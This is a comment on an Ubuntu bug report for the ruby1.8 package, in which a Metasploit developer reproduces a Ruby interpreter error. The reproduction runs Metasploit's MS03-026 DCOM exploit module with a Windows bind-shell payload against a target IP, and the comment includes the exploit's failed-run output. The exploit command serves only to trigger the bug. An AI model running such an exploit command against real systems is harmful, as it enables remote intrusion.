Ubuntu
ruby1.8 package

  1. Bug #282302
  2. Comment #4

Comment 4 for bug 282302

Revision history for this message
HD Moore (hdm-metasploit) wrote :

I was not able to trigger this with a standalone test case, but it is easy to reproduce using the svn version of the Metasploit Framework. The example below assumes you have a Windows server somewhere with port 135 open:

$ svn co http://metasploit.com/svn/framework3/trunk/ msf3
$ ruby msf3/msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=10.10.10.250 E
(change 10.10.10.250 to a machine with DCOM open, patch level does not matter)

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.250[135] ...
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

A working/patched version of Ruby will not trigger that "uninitialized constant" error.

-HD